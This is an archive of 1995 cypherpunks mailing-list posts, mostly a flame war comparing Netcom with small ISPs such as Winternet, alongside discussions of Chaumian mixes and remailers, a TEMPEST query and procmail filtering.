Message-ID: <Pine.3.89.9501061945.A12905-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Mike Duvos wrote:

> drechsau@winternet.com (Mike Horwath) carefully explains all the
> reasons why it is better to have a Netcom account than a
> Winternet account!
> 
>  > I was going to be in, I decided to rest instead.  So sue me
>  > for it.
> 
> Big providers like Netcom have many employees and many machines.
> Things do not screech to a halt when "the guy who owns the
> machine" takes a mental health day. :)
> 

no instead things screech to a halt when the 1000th user gets on each 
client machine


>  > Talk about net.good.will...you stole service after it was
>  > suspended.
> 
> Free service offered to the public cannot be stolen, even by
> prior dissatisfied customers.  Big providers like Netcom don't
> care if someone they don't like logs onto the machine again as
> "guest".
> 

when she was prohibited from that service because of her actions it is.


>  > Tuesday, after being up for 20+ hours and getting a couple
>  > hours sleep, you call ... Again, sue me, this time for being
>  > tired.
> 
> Service at big providers like Netcom doesn't slack off when "the
> guy who owns the machine" misses his nap...
> 

no they slack off whenever they get a chance


>  > Wednesday, I was going to be into work, which you assumed I
>  > would be, ... I decided I was going to take that day off ...
> 
> ...or when "the guy who owns the machine" goes fishing...
> 

...or when 5 trillion hackers descend on the machine and eat it alive


>  > The machine being down was not used as an excuse, but it is
>  > hard to operate like we used to with only one user machine.
> 
> ...or when "the machine" is broken.
> 

...or when "their network" is broken.


>  > That is 2 counts in 2 days (notified on monday, early, of
>  > the spamming, notified on wed of the mass unsolicited
>  > mailings).  Sorry, someone had to put their foot down, and
>  > it happened to be us.
> 
> Big service providers like Netcom don't interfere with customer
> use of the resources they sell, except when network functionality
> is impacted.  Even in such cases, they try to reach an
> understanding with the user, and terminate accounts only as a
> last resort.  Accounts don't vanish when "the guy who owns the
> machine" decides to throw a tantrum.
> 

if a user on netcom violates the AUP, their account would be 
terminated...if those were the terms of the AUP.

It just so happens the AUP of winternet allows for this situation.

it's a bit far fetched to call HIS reaction a tantrum.... If anyone's 
screaming for mommy it's whats-her-name....



>  > Sorry Carol Anne, but this is a system I administer and I
>  > use the AUP to protect all of us across the 'net.
> 
> I am sure we will all sleep more soundly knowing that Mike
> Horwath and his tiny pimple of a machine on the Internet are
> "protecting" us.

big is better i guess....

> 
>  > We had talked about the winternet t-shirts and how we would
>  > use the work you did and the monies you would receive as
>  > payment.
> 
> Big providers like Netcom don't make silly little deals with
> customers for T-shirts...
> 

Big providers like Netcom don't have a 'community' to speak of.


>  > Well, no t-shirts have gone out and at this time, I will be
>  > cancelling all orders for them and will redesign them and
>  > have them produced externally to what you have done.  This
>  > is what happens when you hold something over someone's head.
> 
> ...or cancel those agreements out of spite when they don't get
> everything done their way.


uhmm, sounds like the deal was cancelled because she didn't 
deliver.,..not out of spite

> 
> You know, I used to use BBS systems a great deal before large
> providers like Netcom began offering personal accounts with
> Internet access at reasonable rates.  A BBS is about as far from
> a common carrier as one can get, and many Sysops disclaim all
> your rights under the ECPA, read private mail, forbid the use of
> PGP, decide what opinions may be expressed on various issues, and
> boot off any user who questions anything they do.  Since the
> Sysop owns the machine, they are legally within their rights to
> act like this, and as long as there are enough users who will put
> up with their behavior, they can run a system.


HAhahaha...if you had any idea what you were talking about, you would 
realize you are totally off base.

Winternet is HARDLY a 'bbs'.  It's a regional internet service....much as 
netcom was before they flooded every city with dialups.

Any professional knows better than to read private mail...and if this is 
so...then they aren't worthy of having a site to run

as for PGP, this is an individual thing....I'm sure mike has no such 
objections...i know here at MindVox we don't...in fact, we installed it 
for the users

Who owns netcom's machines?


> 
> Now that Unix boxes are not much more expensive than PCs used to
> be, every asshole in the world who played Sysop on a BBS now
> envisions himself as Sysadmin of an ISP.  So you have an
> infestation of tiny service providers, running on toy machines,
> that coast along for a few years until the person running them
> either goes bankrupt or gets bored.  I certainly wouldn't
> subscribe to one of these services, because the management
> mentality and problematical service most of them provide is
> exactly what I came to Netcom to get away from.
> 

Once again, you speaketh from your ass....

Netcom is an abomination.....it is the only one of its kind (not counting 
delphi etc, since they were conceived under different systems)

Netcom is a Winternet which has grown out of control.

They suck network services off others (irc as one example) and don't take 
responsibility for the HUGE number of idiots on their service who 
maliciously hack anything they can reach....it's totally without 
personality...AND....it's slower than molasses...the management is out of 
touch with the users and they are so overloaded with trouble reports, 
they don't know what to do with them.


> Quite frankly, I don't see why Carol doesn't just get a Netcom
> account and stop quibbling with this twit.  Stop letting him
> waste any more of your time and let him play his administrative
> power games with newbies who don't know any better.

Yes....join them carol

join them....
join them....
join them....

be like us....
be like us....
be like us....

we will care for your every need....
we will care for your every need....
we will care for your every need....

look deep into my eyes....
look deep into my eyes....
look deep into my eyes....


This has got to be one of the largest loads of crap I've seen tossed on 
this list in the year and a half i've lurked on it.

I'd love to see a response to this...please!

oh...btw...i don't have ANY connection to winternet, other than knowing 
MANY satisfied customers, and having heard a lot about them, as a sysadmin 
for a site in much the same situation.

       ,       /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
   .       .  <((_))  MindVox  ((_))>  phantom access technologies inc
      .        \- \/(:::::::::)\- \/   wozzeck@phantom.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <blane@seanet.com>
Date: Fri, 6 Jan 95 20:26:55 PST
To: cypherpunks <cypherpunks@toad.com>
Subject: Too Much!
Message-ID: <Pine.NXT.3.91.950106202333.12708A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain



  Yet again I have un-subbed from the list because of the S/N ratio. And 
things were looking so good there for a while.

  Advice to Carol Ann: Take your crusade to e-mail.

    Brian

------------------------------------------------------------------------------
"Everyone is a prisoner holding their own key."    | finger blane@seanet.com 
    -- Journey                                     | PGP 2.6 email accepted
------------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:28:32 PST
To: cypherpunks@toad.com
Subject: Re: for-pay remailers and FV
In-Reply-To: <Pine.3.89.9501061816.A25172-0100000@netcom10>
Message-ID: <199501070428.UAA21189@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "James A. Donald" <jamesd@netcom.com>

   On Fri, 6 Jan 1995, Eric Hughes wrote:
   > This whole fracas between blind-sig money and FV money is a symptom of
   > the confusion between clearing and settlement.

   It is nothing to do with that confusion.

Keep your day job.

   > To wit, a remailer consortium would do best to issue a local banknote
   > usable only by themselves and have customers settle with the
   > consortium issuer, rather than any member of the consortium itself.
   > If the consortium issuer were to use blind sigs, the consortium
   > members wouldn't be able to ascertain who paid.

Get it?  The first sentence refers to a "local banknote".  The second
sentence refers to a particular way of issuing that banknote.  Passage
from the general to the specific.

   The problem that we are discussing is how to solve them 
   without using Chaumian money.

Think about how a local clearing organization allows this.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:33:00 PST
To: cypherpunks@toad.com
Subject: Re: A Fire Upon the Deep
In-Reply-To: <Pine.SUN.3.91.950106190639.16522B-100000@eskimo.com>
Message-ID: <199501070432.UAA21211@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Wei Dai <weidai@eskimo.com>

   This is quite sensible given that in the Zone universe, you may have no
   idea how much computing power your enemies have, so no cryptography
   that is only computationally secure can really be trusted.

I asked Vernor about this one a few months ago.  He got lucky on this
one.  He thought that some advances in theory might render the whole
idea ridiculous.  It was not the case that he was considering relative
computational power, which works much better in context, especially
given the hints of some computational power beyond Turing machines.

A great one-liner about debating public-key, in any case.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 6 Jan 95 20:32:28 PST
To: cypherpunks@toad.com
Subject: Re:  Can someone verify this conjecture for me?
Message-ID: <199501070433.UAA16429@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: nelson@crynwr.com (Russell Nelson)
> 
> I'd like to make sure I understand how a digital mix works.  I've read
> Chaum's paper on it, but hey, there's a reason why I don't have a Phd
> in spite of having all the coursework done.
> 
> It seems like it solves two separate problems: 1) foiling traffic
> analysis, and 2) foiling a cheater remailer.  The problems are
> separate, really, because if you really, really trust the remailer (as
> many people do Julf), then 2) isn't a problem.  All you need to do is
> solve 1.  Or, you can solve 1) by using a single remailer.  A
> necessary but not sufficient step to foil traffic analysis is to strip
> headers.

My take on the paper is that he first presents the "mix", or remailer, as
a method of foiling traffic analysis.  Then he extends this to the
"cascade", or chain of remailers, which does not improve traffic analysis
resistance but as you say provides some immunity against a bad operator.

> If you trust any one remailer, then you needn't bother using any other
> ones (assuming that remailer has enough traffic, delay, mixing, etc to
> foil traffic analysis).  There's no real difference between using a
> set (N>1) of trusted remailers and using only one, because you can
> consider the set of remailers to be a single remailer from the point
> of view of traffic analysis.

There are other differences which may be relevant in practice.  One is
bandwidth.  With a Chaumian cascade of N remailers you get N times the
bandwidth used, as well as increased latency through the remailer
network.

One thing that is not often appreciated in Chaum's paper is that at least
in his first description of the cascade, the assumption is that all users
use the same sequence of remailers in the same order.  We OTOH usually assume
a different model, where the different possible paths are chosen with
some distribution and randomness.  I posted an analysis of some of the
impacts of this difference a few months ago.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLw4ZXhnMLJtOy9MBAQGjtwIA7tlEMnKPqUAVqAMSmK6EE6eaOlzhqeLL
hsHXhNJajyZQjF6osybGSYJ00UBhRkbAxUOtjY4MNf6oMrb9fKRxGg==
=A3oZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 6 Jan 95 20:48:40 PST
To: pcassidy@world.std.com (Peter F Cassidy)
Subject: Re: Peter D. Lewis
In-Reply-To: <Pine.3.89.9501062325.B10171-0100000@world.std.com>
Message-ID: <199501070448.UAA05731@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter F Cassidy wrote:
> 
> wired has balls. the economist has to figure out what all this stuff 
> means in the real world. wired just sells ads around the events it 
> covers. lewis is innocent compared to wanton scum like kelly. 

Maybe I'm biased, but I have a lot of respect for Kevin Kelly. I met
him at the first "Artificial Life" conference, at Los Alamos, 1987,
and he drove down here to Santa Cruz to interview me for several hours
for his not-yet-published "Wired." (As it turned out, Steven Levy also
interviewed some of us and Kelly chose to run Levy's article in the #2
issue of "Wired," instead of his own, and submitted his own article
to "Whole Earth Review," where it ran in the Summer 1993 issue.)

I've found Kelly to be somewhat quiet, and deep, and not all
flamboyant and grubbing after soundbite quotes.

His book "Out of Control," 1994, is the best summary I've seen of the
swirl of concepts we are generally interested in.

So, what's your problem with Kelly? If it's the profit motive  of
"Wired," we disagree, as I think profits are great. If it's the
ad-laden pages of "Wired," well, that's life in the high-tech age of
cheap color printing, zillions of Macintoshes, and a culture that
loves high-tech glitz.

I think Kelly is a person of high integrity. It's hard to demand much
more than this.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Fri, 6 Jan 95 20:50:56 PST
To: nesta@nesta.pr.mcs.net
Subject: Re: procnail
In-Reply-To: <Pine.3.89.9501062210.A7984-0100000@nesta.pr.mcs.net>
Message-ID: <199501070450.UAA21282@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Fri, 6 Jan 95 19:32:02 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: A Fire Upon the Deep
In-Reply-To: <Pine.SUN.3.91.950106190639.16522B-100000@eskimo.com>
Message-ID: <Pine.3.89.9501062110.C6731-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Wei Dai wrote:

> In article <199501052231.OAA11745@netcom5.netcom.com>, tcmay@netcom.com 
>  
> There was some recent talk about network agent technology on this list.
> Vinge mentions almost in passing how an entire planet (or maybe planets)
> was taken over by an "intelligent net packet".  Makes me rather nervous
> about things like Magic Cap...
>
does anyone have any information about intelligent agents?  I mean I know 
about filter and stuff, but they aren't intelligent agents.  I assume one 
would be something like the WWW worm and other searching scripts that 
have a database of information to cross-reference their finds and decide 
what to send back to you.  the WWWWorm is a good centralized illustration 
of this, with a searchable index of HTML pages.  Or is there something 
else that makes up an "intelligent agent"?
  
> One more thing that's marginally related to cypherpunks (hey I really
> like this book so I'll take any chance I can to talk about it ;-) is
> the idea that the efficiency of distributed computation (and distributed 
> intelligence) depends on high bandwidth and low latency of the communication
> medium.  Since anonymity seems to have rather high costs in terms of
> bandwidth and latency (compare anonymous e-mail with internet video
> conferencing or even with normal e-mail), this implies that
> an organization of anonymous agents will not work as efficiently as
> a similar organization whose members are not concerned about
> anonymity.

i disagree strongly.  anonymity with almost no increase in latency or 
decrease in bandwidth is easily viable.  Especially if it was a group of 
colleagues planning to get together, I mean the remailers and stuff are a 
different thing altogether, but ytalk or another conferencing system with 
untraceable features is no problem, hell just a conference call dialing up 
from payphones, or a favorite hacker trick of running a conference off a 
COCOT.  etc....

i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek.Zeanah@f903.n102.z1.fidonet.org (Derek Zeanah)
Date: Sat, 7 Jan 95 00:52:00 PST
To: cypherpunks@toad.com
Subject: TEMPEST Questions...
Message-ID: <121_9501062145@borderlin.quake.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I'm writing an article on TEMPEST technology.

The focus is on what TEMPEST is and how to defeat it, if possible.  So far
I've gotten some insightful information, but I'm looking for all I can get.

Has anyone ever heard of TEMPEST being used in the continental US?  Can anyone
tell me what measures offer some level of protection, or steps that can be
taken to reduce the likelihood of being successfully targeted?  Has anyone
ever seen TEMPEST in action?

Any and all information will be greatly appreciated.

I prefer responses via e-mail to dzeanah@holonet, but I also read this
newsgroup pretty frequently.

Thanks a lot.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLw4n/EwIwf2qjF2hAQGcuQP/UtKXz0w3icEf3j094LpkOmr7t+miBcT4
9T0rsZ8UNz/Md7l4iY0sA929vU5IiZs58dTH0qiIVrFLf5qh0hzV+7edX6ARxccP
ZSsdchd6g6LdRJn+s4QvOQT19TgcAGfW1p0lbVvDKGsh2+KmpQ4jHiLC3ugYq2x3
nqL4aY8dC4c=
=L/Fy
-----END PGP SIGNATURE-----



~~~ PGPBLUE 3.0 <NR>

... I don't see my signature anywhere on this "social contract"
--
| Fidonet:  Derek Zeanah 1:102/903
| Internet: Derek.Zeanah@f903.n102.z1.fidonet.org
| via Borderline! uucp<->Fido{ftn}gate Project +1-818-893-1899





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@einstein.ssz.com>
Date: Fri, 6 Jan 95 20:41:56 PST
To: cypherpunks@toad.com
Subject: Remailers, Linux, & Help ...
Message-ID: <199501070337.VAA00697@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Hi all,

Normally I use(d) 'ravage@bga.com' to access this list but the times they are a
changin' ...

I have successfully gotten my network at home on Internet via an ISDN link. We
are interested in setting up a remailer which among other things supports
anonymity. If anybody has experience or learned input on doing this under 
Linux please contact me. 


A reminder that RoboFest 6 in Austin, TX will occur this year on April 1 & 2.
If there are any c-punks interested in giving a talk or doing demos then 
please contact me. If any of you folks are in the area then stop by and say
Hi. I will be working at the Wired Society booth.

Take care!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 21:57:33 PST
To: cypherpunks@toad.com
Subject: Re: Netcom is not a good example (Was: Re: Files and mail)
In-Reply-To: <Pine.SUN.3.91.950107000218.29538D-100000@unix2.netaxs.com>
Message-ID: <199501070557.VAA12227@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Michael Handler <grendel@netaxs.com> writes:

 > Yeah. They only kill accounts when people criticize
 > NetCruiser. :-P

 > Netcom is hardly an example of a quality service provider.
 > They suffer periodic long term news and email delays; their
 > service personnel are rude, slow, and unprofessional (read:
 > Bruce Woodcock & the above incident);

NetCruiser is a "work in progress" and continues to evolve in the
right direction.  Bruce Sterling Woodcock is history.  On the
rare occasions when I have interacted with support@netcom.com,
their responses have been both helpful and provided in a timely
fashion.

 > Their security has been compromised countless times

This is Unix.  Not a problem exclusive to Netcom.

 > They are home to some of the most infamous net.kooks and
 > net.cretins (like Tom Servo, currently), ...

I suppose I should be pleased that you have not included me by
name in the list. :)

 > Frankly, I'd rather have a Winternet account than a Netcom
 > account.

Fine with me.  As long as *I* don't have to have a Winternet
account.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: I'm Wozz <wozzeck@phantom.com>
Date: Fri, 6 Jan 95 19:07:38 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: Files and mail
In-Reply-To: <Pine.3.89.9501061827.A22477-0100000@netcom10>
Message-ID: <Pine.3.89.9501062211.A16409-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, James A. Donald wrote:

> On Fri, 6 Jan 1995, I'm Wozz wrote:
> > > 
> > > Big providers like Netcom have many employees and many machines.
> > > Things do not screech to a halt when "the guy who owns the
> > > machine" takes a mental health day. :)
> > > 
> > 
> > no instead things screech to a halt when the 1000th user gets on each 
> > client machine
> 
> When Netcom slows down, this is not because the asshole in charge
> is being an asshole.

I'd hardly call taking a day off being an asshole.  Is he supposed to 
staff the thing 24 hours a day 7 days a week?

No...its a small operation, that cannot be expected.


> 
> He may well be an asshole, but the size of netcom protects
> me from having to discover this.
> 

and you like the fact that you have NO idea who's running the place.

> This is good for my mental health.  
> 
> > 
> > I'd love to see a response to this...please!
> 
> You are totally full of shit.

and why is this?  there is no support for this statement...


> 
> Mike Horwath was arrogant and unprofessional.  
> 

hardly...after the fit this woman threw.  CC'ing his private mail and 
interactions with her to COMPLETELY unrelated places .... such as

cypherpunks, nicholas negreponte of all people, wired, etc, etc, etc

as i understand the situation, the main contention here is that she was 
trying to sell space on her web pages.....on winternet's 
machines....without winternet's permission.

How would netcom react to such a situation (oh thats right....you're not 
allowed to have web pages)

How about a similar situation, such as you selling the time you don't use 
on your account to a friend and pocketing the money


> The problems you describe with Netcom's service are entirely
> accurate.  I am looking for a better solution. Submitting to 
> the authority of an arrogant and incompetent fool does not
> seem like a good solution.
> 

no...instead, submit to the authority of 100 or so ANONYMOUS arrogant 
incompetent fools


> He is plainly a fool, because if I had acted as he has acted,
> I would certainly not post this all over the place.
> 

he's not posting this all over the place....Carol had a fit and he chose 
to respond.  I'm afraid the baby here is Carol


  ,    +      .        /\_-\ ==================----------------------
    .      `    .     <((_))> ==============--------------------
`        x    .        \- \/ ===========------------------
       ,       /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
   .       .  <((_))  MindVox  ((_))>  phantom access technologies inc
      .        \- \/(:::::::::)\- \/   wozzeck@phantom.com
  +      `             /\_-\ ===========------------------
   .   ,   *    '     <((_))> ==============--------------------
+             x        \- \/ ==================----------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: I'm Wozz <wozzeck@phantom.com>
Date: Fri, 6 Jan 95 19:20:46 PST
To: Mike Duvos <mpd@netcom.com>
Subject: Re: Files and mail
In-Reply-To: <199501070212.SAA19162@netcom3.netcom.com>
Message-ID: <Pine.3.89.9501062250.B16409-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Mike Duvos wrote:

> "I'm Wozz" <wozzeck@phantom.com> writes:
> 
> [miscellaneous Netcom-honking elided]
> 
>  > It just so happens the AUP of winternet allows for this
>  > situation.
> 
> Right.  And a small service provider can make any "terms of
> service agreement" his or her little heart desires.  Just like
> the owner of a two line BBS.  With big service providers, such
> things tend to be done in a somewhat more business-like fashion.


hahah....netcom can make up anything they want to.

You do of course, read these agreements before you get on...don't you...

Here's a simple solution...don't get on a system whose AUP you disagree 
with.

Your assertion that simply because a company is not netcom's size, that 
it's unprofessional and incompetent is ridiculous.

> 
>  > it's a bit far fetched to call HIS reaction a tantrum.... If
>  > anyone's screaming for mommy it's whats-her-name....
> 
> Well, if I posted a message to 10 newsgroups and some bozo posted
> a message to a.c-e.n-a falsely implying that it was the beginning
> of some sort of massive spam, I would certainly not be pleased.
> If Netcom, after receiving some small amount of flamage on the
> subject, summarily removed access to my account and made
> themselves unavailable for several days when I tried to contact
> them to discuss the matter, and then tossed me off with a
> flippant "so sue me" when I protested, I would be even less
> pleased.  Fortunately, I can't imagine Netcom even caring about a
> 10 newsgroup cross-post.
> 

right....because Netcom is FILLED with assholes....those that crosspost 
to 10 groups are overlooked


>  > big is better i guess....
> 
> In the case of Internet Service Providers, big is definitely
> better.  There are simply economies of scale which are not
> realized with smaller operations.  Netcom has had some problems,
> but almost all of them were growth related.  None of them were
> intrinsic to the systems and network itself.
> 


so...AOL is better than netcom?

at least they have an irc server.

and ALL of netcom's problems are related to the systems and network....

they didn't plan their expansion correctly....and as a result...are 
feeling it now.

>  > Winternet is HARDLY a 'bbs'.  Its a regional internet
>  > service....much as netcom was before they flooded every
>  > city with dialups.
> 
> Read again, this time for comprehension.  I did not say Winternet
> was a BBS.  Merely that smaller ISPs have many of the undesirable
> characteristics found in BBS systems.
> 

and Netcom has many of the undesirable characteristics found in big 
systems like Prodigy and Compuserve...

if you honestly find this attractive.....well, enjoy


>  > Any professional knows better than to read private
>  > mail...and if this is so...then they aren't worthy of having
>  > a site to run
> 
> For legal purposes, most BBS systems declare that for the
> purposes of the ECPA, there is no such thing as private mail on
> their system.  The Sysop is then free to read anything he wishes
> to.  This policy is clearly stated in the user agreements of
> almost all BBS systems offering access to the public.
> 

well of course.....Netcom will read your mail too if you are accused of 
hacking.  The fact is....the chances of someone reading your mail on 
Netcom are about 100 times higher than on a smaller system....simply 
because the place is so overridden with root wielding hackers who have 
nothing better to do than torment others....

>  > as for PGP, this is an individual thing....I'm sure mike
>  > has no such objections...i know here at MindVox we
>  > don't...in fact, we installed it for the users
> 
> Many BBS Sysops forbid PGP and kick users off their systems who
> use it.  They cite fears of encrypted illegal porn and credit
> card numbers passing through their systems, and potential legal
> liability.
> 

well......once again.....shop before you buy.  You can't make such 
blanket assertions, because they simply aren't true. 


>  > Netcom is an abomination.....it is the only one of its kind
>  > (not counting delphi etc, since they were conceived under
>  > different systems)
> 
> Netcom is the fastest growing and leading Internet Service
> Provider.  Their ability to attract new customers is limited only
> by the rate at which they are able to increase capacity.  Their
> respect for freedom of expression is absolute and they do not
> meddle in their customers' affairs.  Their prices are reasonable
> and their user agreement is fair.  Works for me. :)
> 


Netcom is also the LEADING source of trouble for the rest of the network 
because of the way they handle their user population.  They can't keep up 
with all their problems.  This seems to translate to you as - "They 
respect me and don't bother me"  The fact is....they don't even know who 
the hell you are.  And....being a matter of scale, as several pointed out...

netcom is about 100 times the size of winternet....(approximation)...

thus...lets multiply everything by 100, profits, users, problems, etc, etc

If one of their users posted (10x100) 1000 MAKE.MONEY.FAST posts to 1000 
different groups.....you can bet that person wouldn't have their account 
the next day.

>  > They suck network services off others (irc as one example)
>  > and don't take responsibility for the HUGE number of idiots
>  > on their service who maliciously hack anything they can
>  > reach....its totally without personality...AND....its slower
>  > than molasses...the management is out of touch with the
>  > users and they are so overloaded with trouble reports, they
>  > don't know what to do with them.
> 
> Perhaps an exaggerated description of Netcom a few months ago,
> but certainly not the current state of affairs.  I always get a
> line when I dial in, response time is reasonable, disk is
> abundant, and almost all software is available.  Speed of network
> connections to other sites is quite acceptable.
> 

this is THEIR network.....

there is ANOTHER network out there....its called...the Internet.

I've had MANY users at my site connecting from netcom, and insisting that 
our T1 is overloaded because of the chunky responses they are getting...

well, guess what.  As soon as they tried from somewhere else....their 
problems disappeared.

They contribute very little to the Internet .... and that which they do 
is overshadowed by the harm many of their more immature users cause

> 
>  > oh...btw...i don't have ANY connection to winternet, other
>  > than knowing MANY satisfied customers, and having heard
>  > a lot about them, as a sysadmin for a site in much the same
>  > situation.
> 
> The number of satisfied customers is not the measure of a site,
> any more than the number of people still alive is the measure of
> a disease.

its not?  then your opinion doesn't count...right?
i mean...you're just a satisfied user

> 
> Netcom works with the reliability of the phone company.  It is
> always there, almost always up, and is redundant enough that when
> something breaks, it is still usable.  I pay my $19.50 a month
> and I get unlimited everything.  I'm happy.
> 

If you call netcom usable...you've obviously NEVER tried another ISP...or 
had several VERY bad experiences with the few you've tried.  I urge you 
to give the whole situation another look.


  ,    +      .        /\_-\ ==================----------------------
    .      `    .     <((_))> ==============--------------------
`        x    .        \- \/ ===========------------------
       ,       /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
   .       .  <((_))  MindVox  ((_))>  phantom access technologies inc
      .        \- \/(:::::::::)\- \/   wozzeck@phantom.com
  +      `             /\_-\ ===========------------------
   .   ,   *    '     <((_))> ==============--------------------
+             x        \- \/ ==================----------------------








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: I'm Wozz <wozzeck@phantom.com>
Date: Fri, 6 Jan 95 19:22:52 PST
To: cypherpunks@toad.com
Subject: re: Netcom
Message-ID: <Pine.3.89.9501062250.C16409-0100000@mindvox>
MIME-Version: 1.0
Content-Type: text/plain



Oh yes....and how can we forget...

for all its superiority....it seems to have dropped SLIP/PPP because that 
made them have to deal with the customers too much.

Makes you feel all loved eh?

  ,    +      .        /\_-\ ==================----------------------
    .      `    .     <((_))> ==============--------------------
`        x    .        \- \/ ===========------------------
       ,       /\_-\(:::::::::)/\_-\   matthew e. cable - systems administrator
   .       .  <((_))  MindVox  ((_))>  phantom access technologies inc
      .        \- \/(:::::::::)\- \/   wozzeck@phantom.com
  +      `             /\_-\ ===========------------------
   .   ,   *    '     <((_))> ==============--------------------
+             x        \- \/ ==================----------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johnathan Corgan <jcorgan@scruznet.com>
Date: Fri, 6 Jan 95 22:28:11 PST
To: "L. Todd Masco" <cypherpunks@toad.com
Subject: Re: Too Much!
Message-ID: <Chameleon.4.01.950106222823.jcorgan@jcorgan.sj.scruznet.com>
MIME-Version: 1.0
Content-Type: text/plain


>You might want to try reading it from NNTP, via c2.org or hks.net.  You
>can then use Kill files.

What is the group name?

==
Johnathan Corgan       "Violence is the last refuge of the incompetent."
jcorgan@scruznet.com                    -Isaac Asimov






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Fri, 6 Jan 95 20:38:48 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: procnail
Message-ID: <Pine.3.89.9501062210.A7984-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


in response to the recent barrage of nonsensical bullshit here, I was 
wondering if anyone knew the archive site for procmail, the mail filtering 
program? I think this is a good time to school everyone in the basics of 
Killfiles.  I have never wanted to killfile a person before, this is a 
big step for me. 8)




i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 6 Jan 95 20:03:52 PST
To: cypherpunks@toad.com
Subject: Can someone verify this conjecture for me?
Message-ID: <m0rQSSj-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to make sure I understand how a digital mix works.  I've read
Chaum's paper on it, but hey, there's a reason why I don't have a PhD
in spite of having all the coursework done.

It seems like it solves two separate problems: 1) foiling traffic
analysis, and 2) foiling a cheater remailer.  The problems are
separate, really, because if you really, really trust the remailer (as
many people do Julf), then 2) isn't a problem.  All you need to do is
solve 1.  Or, you can solve 1) by using a single remailer.  A
necessary but not sufficient step to foil traffic analysis is to strip
headers.

If you trust any one remailer, then you needn't bother using any other
ones (assuming that remailer has enough traffic, delay, mixing, etc to
foil traffic analysis).  There's no real difference between using a
set (N>1) of trusted remailers and using only one, because you can
consider the set of remailers to be a single remailer from the point
of view of traffic analysis.

But to be sure, at least one of your remailers MUST attempt to foil
traffic analysis, otherwise you're effectively mistrusting the
remailer operators but trusting the NSA (or FBI).  As I said a month
or two ago, you MUST assume that the spooks are watching all the
remailers.  It's cheap and easy, therefore it's being done.

Sorry for the Crypto 101, but I figure that there are other people out
there who don't understand it.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?
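
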